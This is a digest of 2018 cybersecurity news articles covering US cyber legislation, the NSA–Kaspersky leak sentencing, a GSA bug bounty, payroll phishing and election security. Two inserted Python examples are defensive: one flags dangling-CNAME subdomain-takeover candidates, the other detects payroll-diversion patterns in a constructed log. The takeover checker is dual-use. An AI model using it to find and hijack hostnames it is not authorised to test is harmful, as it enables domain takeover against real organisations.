One of the bills, introduced recently by Senators Maggie Hassan and Rob Portman, is the DHS Cyber Incident Response Teams Act of 2018, which aims to strengthen cybersecurity by requiring the Department of Homeland Security (DHS) to create permanent incident response teams and what lawmakers call “cyber hunt” teams.

These teams would help prevent cyberattacks on both federal agencies and private sector companies, and help mitigate the impact of attacks. The legislation was proposed following reports that Russia-linked threat actors targeted electric utility and other critical infrastructure companies in the U.S.

A companion bill, introduced by Chairman of the House Committee on Homeland Security, Rep. Michael McCaul, recently passed the U.S. House of Representatives.

Another bill approved on Wednesday by the committee is the Federal Rotational Cyber Workforce Program Act of 2018, which Sen. Hassan also co-sponsored. The bill proposes a new program called the Federal Rotation Cyber Workforce Program (FRCWP) that will create policies and procedures for temporarily moving employees from one agency to another.

“Our country faces ever-evolving cyber threats from Russia, China, criminal hackers, and cyber terrorists every single day, and these bipartisan bills will help bolster cyber defenses at federal agencies in order to better protect Americans,” Sen. Hassan said. “While we have far more work to do, these bipartisan bills are important steps to strengthen our elite cyber defense teams, and I urge my colleagues across the aisle to bring these measures to the floor for a vote as quickly as possible.”

Another cybersecurity bill co-sponsored by Sen. Hassan is related to the federal supply chain. The Federal Acquisition Supply Chain Security Act of 2018 was introduced after the government banned cybersecurity products from Kaspersky Lab due to concerns over Russian spying.

The bill seeks the creation of a Federal Acquisition Security Council whose role will be to develop criteria and processes for assessing the supply chain risk posed to national security and the public interest by the acquisition of certain technologies.

The committee also passed the Federal Information Systems Safeguards Act of 2018, which allows federal agencies to make decisions related to securing IT and information systems. The bill allows the head of an agency to restrict or prohibit access to a website, and deploy or update cybersecurity measures.

Finally, the Senate Homeland Security and Governmental Affairs Committee voted to approve the Advancing Cybersecurity Diagnostics and Mitigation Act, which establishes a continuous diagnostics and mitigation program at the DHS.

Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak
27.9.2018 securityaffairs

Former NSA TAO hacker was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky.
A former member of the NSA’s Tailored Access Operations hacking team was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky software.

The former NSA hacker is Nghia Hoang Pho (68); he served US intelligence for 10 years as a member of the NSA’s elite Tailored Access Operations hacking unit.

The man pleaded guilty in December 2017 to one count of willful retention of classified national defense information.

The Vietnam-born American citizen, who was living in Ellicott City, Maryland, was charged with illegally removing top secret materials.

The NSA hacker admitted taking home copies of classified NSA hacking tools and exploits with the knowledge that they were cyber weapons.

The tools were detected by the Kaspersky Lab software installed on the NSA hacker's personal computer and were uploaded to Kaspersky's servers for further analysis.

Kaspersky Lab published a detailed report on how cyber spies could easily have stolen the exploits from the NSA employee's Windows PC.

According to the prosecutors, between 2010 and 2015, the former NSA hacker had taken home with him TAO materials, including exploits and hacking tools.

According to the telemetry logs collected by the Russian firm, the staffer temporarily switched off the antivirus protection on the PC and infected it with a backdoor hidden in a product key generator while trying to activate a pirated copy of Office.

On September 11, 2014, Kaspersky's antivirus detected the Win32.GrayFish.gen trojan on the former TAO member's PC; some time later the employee disabled the Kaspersky software in order to run the activation-key generator.

When the antivirus was re-enabled on October 4, it removed the backdoored key generator from the PC and uploaded it to Kaspersky's cloud for further analysis.

Kaspersky published a second report that sheds light on the investigation the firm conducted into the NSA-linked Equation Group APT.

Kaspersky searched its detection databases for alerts dating back to June 2014, roughly six months before the start of 2015, the year in which its antivirus was alleged to have been hacked, using wildcards such as "HEUR:Trojan.Win32.Equestre.*". The experts found a few test signatures in place that produced a large number of false positives.

The analysis revealed one signature, "HEUR:Trojan.Win32.Equestre.m", that fired a large number of times in a short span on a single system, matching a 7zip archive (referred to below as "[undisclosed].7z"). That system turned out to contain not only this archive but many other files, both common and unknown, indicating that its user was probably involved in the malware's development.

The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user had downloaded a pirated copy of Microsoft Office 2013 whose .ISO contained the Mokes backdoor.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two-month period its security software found 128 separate malware samples on the machine that were not related to the Equation Group.

Kaspersky found that the Mokes command-and-control servers were apparently being operated by a Chinese entity going by the name "Zhou Lou", from Hunan, using the email address "zhoulu823@gmail.com".

The security firm explained that it is also possible that the NSA employee's PC had been infected with a sophisticated strain of malware, developed by an APT, that was not detected at the time.

According to the Wall Street Journal, the intrusion into Pho's computer led to the Russians obtaining information on how NSA TAO hacks into foreign computer networks.

“As a result of his actions, Pho compromised some of our country’s most closely held types of intelligence, and forced NSA to abandon important initiatives to protect itself and its operational capabilities, at great economic and operational cost,” declared US Attorney Robert Hur.

The US government banned the use of Kaspersky anti-virus software on government networks and accused the company of working for Russian intelligence.

Kaspersky has repeatedly denied any ties to Russian intelligence and announced the launch of a transparency initiative that involves giving partners access to the source code of its products.

U.S. Unveils First Step Toward New Online Privacy Rules
26.9.2018 securityweek

The US administration called Tuesday for public comments on a "new approach to consumer data privacy" that could trigger fresh regulations of internet companies.

The Commerce Department said the announcement is part of an effort to "modernize US data privacy policy for the 21st century."

The move follows the implementation this year of ramped up data protection rules imposed by the European Union, and a new privacy law enacted in California.

Both measures will impact internet firms whose websites can be accessed around the globe.

Privacy and data protection have come into greater focus in response to these new laws, and also because of growing concerns on how private data is handled following revelations on the hijacking of millions of Facebook user profiles by a political consultancy ahead of the 2016 election.

"The United States has a long history of protecting individual privacy, but our challenges are growing as technology becomes more complex, interconnected and integrated into our daily lives," said David Redl, who heads the agency's National Telecommunications and Information Administration (NTIA).

"The Trump administration is beginning this conversation to solicit ideas on a path for adapting privacy to today's data-driven world."

The agency said it was also developing a voluntary privacy framework to help organizations manage risk and working on ways "to increase global regulatory harmony."

The Commerce Department statement said the agency is focused on "desired outcomes" for privacy rather than dictating specific practices.

But it plans to seek public comment on transparency practices -- how data is collected and used -- as well as security safeguards.

Users of online platforms "should be able to reasonably access and correct personal data they have provided," the statement added. "Organizations should take steps to manage the risk of disclosure or harmful uses of personal data."

Ex-NSA Hacker Sentenced to Jail Over Kaspersky Leak
26.9.2018 securityweek

A former National Security Agency hacker whose leak of top-secret hacking material led to the US government ban on Kaspersky software was sentenced to 66 months in prison Tuesday.

Nghia Hoang Pho, 68, a 10-year veteran of the NSA's elite Tailored Access Operations hacking unit, pleaded guilty in December to one count of willful retention of classified national defense information.

Authorities discovered that between 2010 and 2015, he had taken home with him substantial TAO materials, including programs and data, that eventually ended up in the hands of Russian intelligence.

Vietnam-born Pho put the information on his home computer, which was protected by the popular Kaspersky anti-virus program. US authorities believe that Russian intelligence was able to access his computer through Kaspersky.

Like any anti-virus product, the Kaspersky software runs with broad, privileged access to the machine's files and processes in order to function.

It then communicates the results of its anti-virus scans to Kaspersky headquarters -- in Moscow.

The Wall Street Journal reported last year that the 2015 penetration of Pho's computer led to the Russians obtaining information on how the NSA itself infiltrates foreign computer networks and protects itself from cyberattacks.

Kaspersky itself later confirmed that its software had uploaded the material, which it said included source code for so-called Equation Group hacking software from the NSA.

The leak was one of the most devastating ever for the NSA, one of the US government's most important spy agencies, and significantly set back its operations against foreign targets' computers.

"As a result of his actions, Pho compromised some of our country's most closely held types of intelligence, and forced NSA to abandon important initiatives to protect itself and its operational capabilities, at great economic and operational cost," said US Attorney Robert Hur.

The incident was a key reason for the US government's ban on using Kaspersky anti-virus software on government computers, warning that the company has suspect links to Russian intelligence.

Kaspersky denies any ties to the Russian government or its spies.

U.S. General Services Administration Launches Bug Bounty Program
25.9.2018 securityweek BigBrothers

The United States General Services Administration's (GSA) Technology Transformation Service (TTS) has launched a bug bounty program on HackerOne, the hacker-powered security platform announced on Friday.

GSA, the first federal civilian agency to have launched a bug bounty program, will pay up to $5,000 for critical vulnerabilities found in its services. However, only some of TTS's services are included in the multi-year HackerOne bug bounty program.

Last year GSA launched a bug bounty and vulnerability disclosure program (VDP) with HackerOne and paid between $300 and $5,000 for flaws reported in public-facing digital systems, including TTS assets such as login.gov, data.gov, cloud.gov and vote.gov.

HackerOne was awarded the new contract in September, following an open market bidding process. The contract runs for up to five years.

On HackerOne’s website, TTS reveals that the scope of the program includes services such as Federalist, data.gov, cloud.gov, and login.gov.

For vulnerabilities in the open source static site web publishing service Federalist, TTS is willing to pay between $250 and $5,000, depending on each flaw’s severity. Assets within scope include federalist.18f.gov, federalist-proxy.app.cloud.gov, federalist-docs.18f.gov, and open source resources (hosted on GitHub) 18F/federalist, 18F/federalist-builder, 18F/federalist-proxy, 18F/federalist-docker-build, and 18F/docker-ruby-ubuntu.

For Data.gov, rewards range between $150 and $2,000, and are awarded for vulnerabilities in www.data.gov, api.data.gov, federation.data.gov, sdg.data.gov, labs.data.gov, catalog.data.gov, inventory.data.gov, static.data.gov, admin-catalog-bsp.data.gov, and GSA/data.gov and GSA/datagov-deploy resources (also on GitHub).

The same bounty amounts are awarded for flaws in Cloud.gov assets, including cloud.gov, account.fr.cloud.gov, admin.fr.cloud.gov, alertmanager.fr.cloud.gov, api.fr.cloud.gov, ci.fr.cloud.gov, dashboard.fr.cloud.gov, diagrams.fr.cloud.gov, grafana.fr.cloud.gov, idp.fr.cloud.gov, login.fr.cloud.gov, logs.fr.cloud.gov, logs-platform.fr.cloud.gov, nessus.fr.cloud.gov, opslogin.fr.cloud.gov, prometheus.fr.cloud.gov, and ssh.fr.cloud.gov.

TTS is willing to pay between $150 and $5,000 for flaws in *.login.gov, https://github.com/18F/identity-idp, https://github.com/18F/identity-sp-sinatra, https://github.com/18F/identity-sp-python, https://github.com/18F/identity-sp-java, and https://github.com/18F/identity-sp-rails.

“‘Subdomain hijacking’ (taking control of a subdomain that was otherwise unused, such as by taking advantage of a dangling CNAME to a third party service provider) is in-scope for bounty awards, when the affected hostnames are within the second-level domains that appear in our in-scope list. These reports will always be considered low-severity unless there is further demonstrated impact,” TTS says.
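The "dangling CNAME" case in that scope note is worth being precise about, because it is what most subdomain-takeover reports come down to: an in-scope hostname still aliases a third-party host that no longer exists, so whoever can register that host on the provider serves content under the government name. The checker below is an added example, not TTS or HackerOne code. It follows a hostname's CNAME chain, treats an alias whose target returns NXDOMAIN (or loops without ever reaching an address) as dangling, and applies the quoted rule: only hostnames whose second-level domain is in the program's list count, and they are rated low severity. The DNS data is constructed for the demo and the `constructed_lookup` hook stands in for a real resolver query; the in-scope set is taken from the domains the article names.

```python
"""Added example: triage dangling-CNAME (subdomain takeover) candidates
against a bug bounty's in-scope second-level domains, following the TTS
scope rule quoted above. Not TTS or HackerOne code."""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Callable, Optional

# Second-level domains named in the article's scope list.
IN_SCOPE_SLDS = {"data.gov", "cloud.gov", "login.gov", "18f.gov"}

# Constructed zone data for the demo; none of these records are real.
# ("A", addr) is a terminal answer; ("CNAME", target) is an alias; an absent
# name stands for NXDOMAIN, which is what a dangling alias target returns.
CONSTRUCTED_RECORDS: dict[str, tuple[str, str]] = {
    "www.data.gov.": ("A", "192.0.2.10"),
    # alias to a decommissioned third-party host: the takeover candidate
    "old-blog.data.gov.": ("CNAME", "retired-site.example-pages.net."),
    # healthy two-hop alias inside the same SLD
    "docs.cloud.gov.": ("CNAME", "docs-prod.cloud.gov."),
    "docs-prod.cloud.gov.": ("A", "192.0.2.20"),
    # dangling, but the SLD is not in the program's list
    "staging.example.gov.": ("CNAME", "gone.example-hosting.net."),
    # CNAME loop: never resolves, must not hang the checker
    "loop.data.gov.": ("CNAME", "loop.data.gov."),
}

Lookup = Callable[[str], Optional[tuple[str, str]]]


def constructed_lookup(name: str) -> Optional[tuple[str, str]]:
    """Stand-in for a DNS query, answering from the constructed records above."""
    return CONSTRUCTED_RECORDS.get(name)


def normalize(name: str) -> str:
    """Lower-case, fully qualified form so chain comparisons are exact."""
    name = name.strip().lower()
    return name if name.endswith(".") else name + "."


def second_level_domain(name: str) -> str:
    """'api.fr.cloud.gov.' -> 'cloud.gov' (sufficient for the .gov names here)."""
    labels = normalize(name).rstrip(".").split(".")
    return ".".join(labels[-2:])


@dataclass
class Finding:
    hostname: str
    chain: list[str] = field(default_factory=list)  # CNAME targets, in order
    dangling: bool = False          # alias chain ends in NXDOMAIN or never terminates
    in_scope: bool = False          # hostname's SLD is in IN_SCOPE_SLDS
    severity: Optional[str] = None  # quoted rule: "low" until further impact is shown


def follow_chain(name: str, lookup: Lookup, max_hops: int = 8) -> tuple[list[str], bool]:
    """Follow CNAMEs from `name`. Returns (targets visited, resolved_to_address)."""
    chain: list[str] = []
    current = normalize(name)
    seen = {current}
    for _ in range(max_hops):
        record = lookup(current)
        if record is None:          # NXDOMAIN at this hop
            return chain, False
        rtype, value = record
        if rtype == "A":
            return chain, True
        current = normalize(value)
        chain.append(current)
        if current in seen:         # loop: treat as unresolvable
            return chain, False
        seen.add(current)
    return chain, False             # too many hops: treat as unresolvable


def assess(hostname: str, lookup: Lookup = constructed_lookup) -> Finding:
    """Classify one hostname as a takeover candidate and apply the scope rule."""
    chain, resolved = follow_chain(hostname, lookup)
    finding = Finding(hostname=normalize(hostname), chain=chain)
    finding.in_scope = second_level_domain(hostname) in IN_SCOPE_SLDS
    # Only an alias that points somewhere and never resolves is a candidate;
    # a bare NXDOMAIN with no CNAME is not a dangling record.
    finding.dangling = bool(chain) and not resolved
    if finding.dangling and finding.in_scope:
        finding.severity = "low"
    return finding


if __name__ == "__main__":
    for host in CONSTRUCTED_RECORDS:
        f = assess(host)
        print(f"{f.hostname:26} dangling={f.dangling!s:5} in_scope={f.in_scope!s:5} severity={f.severity}")
```

To run this against live DNS, replace `constructed_lookup` with a function that issues a CNAME query and then an A query (a library such as dnspython does this) and returns the same `(type, value)` shape. The second-level-domain check is deliberately simple because every name in the TTS list is a two-label `.gov` domain; for scopes containing names under public suffixes such as `co.uk` a public-suffix list is needed instead of taking the last two labels.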

HackerOne has conducted six bug bounty programs with the U.S. Department of Defense’s Defense Digital Service (DDS), starting with Hack the Pentagon in 2016 and continuing with Hack the Army, Hack the Air Force, Hack the DTS, Hack the Air Force 2, and Hack the Marine Corps.

Lawmaker: US Senate, Staff Targeted by State-Backed Hackers
22.9.2018 securityweek

Foreign government hackers continue to target the personal email accounts of U.S. senators and their aides — and the Senate’s security office has refused to defend them, a lawmaker says.

Sen. Ron Wyden, an Oregon Democrat, said in a Wednesday letter to Senate leaders that his office discovered that “at least one major technology company” has warned an unspecified number of senators and aides that their personal email accounts were “targeted by foreign government hackers.” Similar methods were employed by Russian military agents who leaked the contents of private email inboxes to influence the 2016 elections.

Wyden did not specify the timing of the notifications, but a Senate staffer said they occurred “in the last few weeks or months.” The aide spoke on condition of anonymity because he was not authorized to discuss the issue publicly.

But the senator said the Office of the Sergeant at Arms, which oversees Senate security, informed legislators and staffers that it has no authority to help secure personal, rather than official, accounts.

“This must change,” Wyden wrote in the letter. “The November election grows ever closer, Russia continues its attacks on our democracy, and the Senate simply does not have the luxury of further delays.” A spokeswoman for the security office said it would have no comment.

Wyden has proposed legislation that would allow the security office to offer digital protection for personal accounts and devices, the same way it does with official ones. His letter did not provide additional details of the attempts to pry into the lawmakers’ digital lives, including whether lawmakers of both parties are still being targeted.

Google and Microsoft, which offer popular private email accounts, declined to comment.

The Wyden letter cites previous Associated Press reporting on the Russian hacking group known as Fancy Bear and how it targeted the personal accounts of congressional aides between 2015 and 2016. The group’s prolific cyberspying targeted the Gmail accounts of current and former Senate staffers, including Robert Zarate, now national security adviser to Florida Sen. Marco Rubio, and Jason Thielman, chief of staff to Montana Sen. Steve Daines, the AP found.

The same group also spent the second half of 2017 laying digital traps intended to look like portals where Senate officials enter their work email credentials, the Tokyo-based cybersecurity firm TrendMicro has reported.

Microsoft seized some of those traps, and in September 2017 apparently thwarted an attempt to steal login credentials of a policy aide to Missouri Sen. Claire McCaskill, the Daily Beast discovered in July. Last month, Microsoft made news again when it seized several internet domains linked to Fancy Bear, including two apparently aimed at conservative think tanks in Washington.

Such incidents "only scratch the surface" of advanced cyberthreats faced by U.S. officials in the administration and Congress, according to Thomas Rid, a cybersecurity expert at Johns Hopkins University. Rid made the statement in a letter to Wyden last week.

“The personal accounts of senators and their staff are high-value, low-hanging targets,” Rid wrote. “No rules, no regulations, no funding streams, no mandatory training, no systematic security support is available to secure these resources.”

Attempts to breach such accounts were a major feature of the yearlong AP investigation into Fancy Bear that identified hundreds of senior officials and politicians — including former secretaries of state, top generals and intelligence chiefs — whose Gmail accounts were targeted.

The Kremlin is by no means the only source of worry, said Matt Tait, a University of Texas cybersecurity fellow and former British intelligence official.

“There are lots of countries that are interested in what legislators are thinking, what they’re doing, how to influence them, and it’s not just for purposes of dumping their information online,” Tait said.

In an April 12 letter released by Wyden’s office, Adm. Michael Rogers — then director of the National Security Agency — acknowledged that personal accounts of senior government officials “remain prime targets for exploitation” and said that officials at the NSA and Department for Homeland Security were discussing ways to better protect them. The NSA and DHS declined to offer further details.

Guarding personal accounts is a complex, many-layered challenge.

Rid believes tech companies have a sudden responsibility to nudge high-profile political targets into better digital hygiene. He said he did not believe much has been done, although Facebook announced a pilot program Monday to help political campaigns protect their accounts, including monitoring for potential hacking threats for those that sign up.

Boosting protection in the Senate could begin with the distribution of small chip-based security devices such as the YubiKey, which are already used in many secure corporate and government environments, Tait said. Such keys supplement passwords to authenticate legitimate users, potentially frustrating distant hackers.

Cybersecurity experts also recommend them for high-value cyber-espionage targets including human rights workers and journalists.

“In an ideal world, the Sergeant at Arms could just have a pile of YubiKeys,” said Tait. “When legislators or staff come in they can (get) a quick cybersecurity briefing and pick up a couple of these for their personal accounts and their official accounts.”

Department of Defense Releases New Cyber Strategy
22.9.2018 securityweek

The U.S. Department of Defense this week released its 2018 cyber strategy, which outlines how the organization plans on implementing the country’s national security and defense strategies in cyberspace.

The new cyber strategy, which supersedes the 2015 strategy, focuses on the competition with China and Russia, but it also mentions other actors, such as North Korea and Iran. The DoD says China has been “eroding U.S. military overmatch and the Nation’s economic vitality” by stealing information, while Russia has used cyber operations to influence elections.

“The Department must take action in cyberspace during day-to-day competition to preserve U.S. military advantages and to defend U.S. interests. Our focus will be on the States that can pose strategic threats to U.S. prosperity and security, particularly China and Russia,” the Pentagon wrote in a summary of the new cyber strategy.

“We will conduct cyberspace operations to collect intelligence and prepare military cyber capabilities to be used in the event of crisis or conflict. We will defend forward to disrupt or halt malicious cyber activity at its source, including activity that falls below the level of armed conflict. We will strengthen the security and resilience of networks and systems that contribute to current and future U.S. military advantages,” it added.

The DoD wants cyber forces to be prepared to assist air, land, sea and space forces during wartime to gain military advantage over its adversaries, which the Pentagon says are also increasingly reliant on computers.

One of the Department’s goals is to ensure that the U.S. can “fight and win wars” in cyberspace while being able to defend its own systems. Another objective is to prevent, defeat and deter malicious cyber activities aimed at critical infrastructure. Finally, the Pentagon wants to work with allies and partners to strengthen its cyber capabilities, expand cyber operations, and enhance information sharing.

As for its strategic approach, the DoD wants to “build a more lethal force, compete and deter in cyberspace, expand alliances and partnerships, reform the Department, and cultivate talent.”

Building a "more lethal force" includes accelerating the development of cyber capabilities for warfighting and counterattacks, leveraging automation and data analysis to improve effectiveness, employing off-the-shelf capabilities in addition to its own, and moving from what it calls a "zero defect" culture to one that fosters agility and innovation.

The Pentagon hopes to deter adversaries by securing its own systems and critical infrastructure, but if that fails it wants to be ready to “employ the full range of military capabilities in response.”

The DoD has recently conducted its first ever cyber posture review, as directed by the National Defense Authorization Act. The results of the review are classified, but a factsheet made public by the organization reveals that the DoD must “continue investments in people, capabilities, and processes to meet fully the objectives set forth in the Strategy.”

FBI Warns of Cyber-Thieves Targeting Payroll Accounts
22.9.2018 securityweek

Cybercriminals are targeting the online payroll accounts of employees in a variety of industries to divert funds, the Federal Bureau of Investigation (FBI) warns.

According to an alert from the FBI's Internet Crime Complaint Center (IC3), numerous such attacks have already been reported, with education, healthcare, and commercial airway transportation being the most impacted industries.

The preferred attack method is phishing, which allows cybercriminals to capture an employee’s login credentials. Armed with this information, the cybercriminals then access the employee’s payroll account and swiftly change their bank account information.

The cyber-thieves also add rules to the employees' payroll accounts so that the victims do not receive alerts about direct deposit changes, and then redirect the direct deposits to accounts they control.

Payroll diversion, the FBI says, can be mitigated through educating employees about the scheme and through informing them on preventative strategies and appropriate reactive measures they should take once a breach has occurred.

“Instruct employees to hover their cursor over hyperlinks included in emails they receive to view the actual URL. Ensure the URL is actually related to or associated with the company it purports to be from,” the FBI says.

URL-based phishing succeeds because the links closely resemble those of the organization they purport to come from, but take the victim to pages controlled by the attackers.

The FBI also notes that instructing employees to not provide log-in credentials or personally identifying information in response to any email should mitigate phishing risks as well. Employees should also be taught to forward any suspicious requests for personal information to the information technology or human resources department.

Organizations should also ensure that the credentials used for payroll purposes are different from those used for other purposes. Heightened scrutiny of bank-information changes initiated by employees when updating direct deposit details, and monitoring of employee logins that occur outside normal business hours, should also mitigate the risks associated with payroll diversion.

Furthermore, organizations are advised to restrict access to the Internet on systems handling sensitive information and to consider adopting two-factor authentication for access to sensitive systems and information. Allowing only required processes to run on systems handling sensitive information is yet another mitigating factor.
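The attack sequence the alert describes (phish credentials, disable the direct-deposit alert, then change the bank details) leaves a recognizable trail in a payroll system's audit log, and the FBI's own mitigations amount to watching for it. The following added example, not FBI or IC3 code, runs that detection over a constructed audit log: it raises a finding for every direct-deposit change, and upgrades severity when the same user suppressed deposit notifications within the previous 24 hours or made the change from a session that began outside business hours. The event schema, field names, business-hours window and 24-hour window are all assumptions; real payroll platforms log these events under their own names.

```python
"""Added example: detect the payroll-diversion pattern the FBI alert describes
(notifications suppressed, then direct-deposit details changed, often from an
off-hours login) in constructed payroll audit events. Not FBI/IC3 code; the
event schema, field names and thresholds are assumptions."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed audit log, one event per line, in the assumed format
# "<ISO timestamp> <user> <event> <source-ip> <details>". None of this is real data.
CONSTRUCTED_AUDIT_LOG = """\
2018-09-10T09:12:03 jdoe login 198.51.100.7 ok
2018-09-10T09:20:41 jdoe view_paystub 198.51.100.7 period=2018-08
2018-09-11T02:14:09 asmith login 203.0.113.44 ok
2018-09-11T02:15:30 asmith alert_rule_changed 203.0.113.44 direct_deposit_notify=off
2018-09-11T02:17:02 asmith direct_deposit_changed 203.0.113.44 routing=******123 account=******9876
2018-09-12T14:05:11 bnguyen login 198.51.100.9 ok
2018-09-12T14:06:50 bnguyen direct_deposit_changed 198.51.100.9 routing=******555 account=******0001
"""

BUSINESS_HOURS = (7, 19)                  # assumed normal local hours, [start, end)
SUPPRESSION_WINDOW = timedelta(hours=24)  # assumed max gap: rule change -> deposit change


@dataclass
class Event:
    ts: datetime
    user: str
    event: str
    src_ip: str
    details: str


def parse_log(text: str) -> list[Event]:
    """Parse the assumed space-separated format; details may contain spaces."""
    events: list[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, event, src_ip, details = line.split(" ", 4)
        events.append(Event(datetime.fromisoformat(ts), user, event, src_ip, details))
    return events


def off_hours(ts: datetime) -> bool:
    """Weekend, or outside the assumed business-hours window."""
    start, end = BUSINESS_HOURS
    return ts.weekday() >= 5 or not (start <= ts.hour < end)


def detect_payroll_diversion(events: list[Event]) -> list[dict]:
    """One finding per direct_deposit_changed event, with reasons and severity."""
    findings: list[dict] = []
    by_user: dict[str, list[Event]] = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_user.setdefault(e.user, []).append(e)

    for user, evs in by_user.items():
        for i, e in enumerate(evs):
            if e.event != "direct_deposit_changed":
                continue
            reasons: list[str] = []
            # 1. Deposit notifications turned off shortly before the bank change:
            #    the step the FBI says attackers take so the victim is not alerted.
            for prior in evs[:i]:
                if (prior.event == "alert_rule_changed"
                        and "notify=off" in prior.details
                        and e.ts - prior.ts <= SUPPRESSION_WINDOW):
                    reasons.append("alert_suppressed_before_change")
                    break
            # 2. The session making the change began outside business hours.
            last_login = next((p for p in reversed(evs[:i]) if p.event == "login"), None)
            if last_login is not None and off_hours(last_login.ts):
                reasons.append("off_hours_login")
            # Every bank-detail change gets at least a low-severity review entry.
            if "alert_suppressed_before_change" in reasons:
                severity = "high"
            elif reasons:
                severity = "medium"
            else:
                severity = "low"
            findings.append({"user": user, "ts": e.ts.isoformat(), "src_ip": e.src_ip,
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_payroll_diversion(parse_log(CONSTRUCTED_AUDIT_LOG)):
        print(f)
```

In the constructed data, `asmith` is the textbook case (02:14 login, alert turned off, bank details changed two minutes later) and is rated high, while `bnguyen`'s daytime change with no rule tampering is rated low and simply queued for the out-of-band confirmation the FBI recommends. A production version would also compare the source IP with the user's usual locations and treat a change that follows a password reset as a further reason.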

US State Department confirms data breach to unclassified email system
21.9.2018 securityaffairs

The US State Department confirmed that hackers breached one of its email systems; the attack potentially exposed personal information of some of its employees.
The incident seems to have affected less than 1% of employee inboxes, roughly 600 to 700 of some 69,000 employees.

“The Department recently detected activity of concern in its unclassified email system, affecting less than 1 per cent of employee inboxes. Like any large organization with a global presence, we know the Department is a constant target for cyber attacks,” states the US State Department.

“We have not detected activity of concern in the Department’s classified email system. We determined that certain employees’ personally identifiable information (PII) may have been exposed. We have already notified those employees.”

The security breach affected an unclassified email system at the State Department, the news of the hack came to light after Politico obtained a “Sensitive but Unclassified” notice about the incident.

“This is an ongoing investigation, and we are working with partner agencies, as well as the private sector service provider, to conduct a full assessment.” a State Department spokesperson told Politico.

“We will reach out to any additional impacted employees as needed.”

After noticing the "suspicious activity" in its email system, the department notified the employees whose personal information may have been compromised.

The State Department did not reveal which kind of data had been accessed by the attackers; at the time of writing, all that is known is that no classified information was exposed.

The department said it has taken steps to secure its system, and it is offering three years of credit and identity theft monitoring to the affected employees.

A group of senators wrote to Secretary of State Mike Pompeo last week raising concerns that the department did not meet federal standards for cybersecurity and questioning its resilience to cyber attacks.

“Sens. Ron Wyden (D-Ore.), Rand Paul (R-Ky.), Ed Markey (D-Mass.), Jeanne Shaheen (D-N.H.) and Cory Gardner (R-Colo.) asked Pompeo for an update on what the State Department has done to address its “high risk” designation, and how many cyberattacks the department had been subject to abroad in the last three years.” reported TheHill.

Georgia's Use of Electronic Voting Machines Allowed for Midterms
20.9.2018 securityweek

Judge Amy Totenberg ruled Monday that the state of Georgia's existing plans for the midterm elections to be conducted via some 27,000 Diebold AccuVote DRE touchscreen voting machines must stand. Her remarks, however, suggest that this should be the last time.

Plaintiffs, comprising the Coalition for Good Governance and citizens of Georgia, had filed a Motion for Preliminary Injunction against the Secretary of State for Georgia, Brian Kemp, in an attempt to force a switch to paper-based voting in time for the November elections. The primary argument is that the direct-recording electronic (DRE) machines to be used cannot produce a paper audit trail with which to verify accurate elections.

This, coupled with the exposure of the registration details of 6.7 million Georgia voters on an unprotected internet-facing database, repeated demonstrations that such voting machines can be hacked, federal government advice that audit trails are necessary, and the constitutional right of citizens to vote, formed the basis of the plaintiffs' argument.

The Secretary of State's response, while insisting that the machines are secure, was primarily focused on the cost, lack of time, and potential confusion that such a late switch could cause.

Judge Totenberg ultimately agreed with the defendants and denied the plaintiff's motion -- but her concluding remarks demand that the state change its attitude in the future. "The State's posture in this litigation -- and some of the testimony and evidence presented -- indicated that the Defendants and State election officials had buried their heads in the sand," she wrote.

She indicated that she is not happy with the way the state handled "the ramifications of the major data breach and vulnerability at the Center for Election Services" and "a host of serious security vulnerabilities permitted by their outdated software and system operations."

Nor was she happy with the way the state presented its case. "Defendants will fail to address that reality if they demean as paranoia the research-based findings of national cybersecurity engineers and experts in the field of elections." In its response to the Motion, the state had dismissed the plaintiffs' concerns as 'paranoia'.

Furthermore, reading between the lines of her concluding remarks, she intimates that she expects the case to come back before future elections, says that she will insist "on further proceedings moving on an expedited schedule", and concludes, "The 2020 elections are around the corner. If a new balloting system is to be launched in Georgia in an effective manner, it should address democracy's critical need for transparent, fair, accurate, and verifiable election processes that guarantee each citizen's fundamental right to cast an accountable vote."

Robert A McGuire, lead attorney for Coalition for Good Governance, expressed disappointment in the ruling, but confirmed that the case will continue. "We will continue to press these voting rights claims, and we fully expect to prevail in the end," he commented.

Bruce P. Brown, Atlanta attorney for the Coalition, added, "Judge Totenberg's decision is broadly consistent with the positions that the Coalition is taking in the case -- particularly the urgent need for Georgia, as soon as feasible, to switch to paper ballots."

Morrison & Foerster partner David Cross, attorney for the citizens of Georgia among the plaintiffs, agrees. "We read the decision as essentially saying it's too late for something at this point, but for the 2020 elections, there will be a change."

Cross told SecurityWeek, "Although the court denied the preliminary injunction, it finds that the current system is critically unsecure and that those entrusted with securing the election are remarkably unqualified and ill-informed about election security. The court emphasizes that our case will proceed expeditiously and finds that we ultimately are likely to win on the merits, which means the state will have to adopt a new, secure system before the 2020 elections. Ironically, it seems the court had little confidence in the state's ability to implement paper ballots now because of the ineptitude that certain election officials exhibited in this case."

Marilyn Marks, the Executive Director of Coalition for Good Governance, said, "The Secretary of State Kemp, the State Election Board, and the bi-partisan Fulton County Election Board refused to act in response to serious and repeated warnings from Congress, federal agencies, National Academy of Science and scores of expert voting system computer scientists that the paperless system is unfit for conducting public elections."

In 'Securing the Vote: Protecting American Democracy', compiled in January 2017 and recently published as a paperback and online, The National Academies warn "According to assessments by members of the U.S. Intelligence Community, actors sponsored by the Russian government 'obtained and maintained access to elements of multiple US state or local electoral boards.' While the full extent and impact of these activities is not known and our understanding of these events is evolving, there is little doubt that these efforts represented an assault on the American system of representative democracy."

One of the recommendations from the Academies is that "Voting machines that do not provide the capacity for independent auditing (e.g., machines that do not produce a voter-verifiable paper audit trail) should be removed from service as soon as possible." Georgia's Diebold AccuVote systems fall within this category.

Nation State Cyber Attacks on Rise, Says Europol
20.9.2018 securityweek

Global ransomware attacks are increasingly linked to nation states, with the lines between politics and crime often blurring, Europe's police agency said on Tuesday.

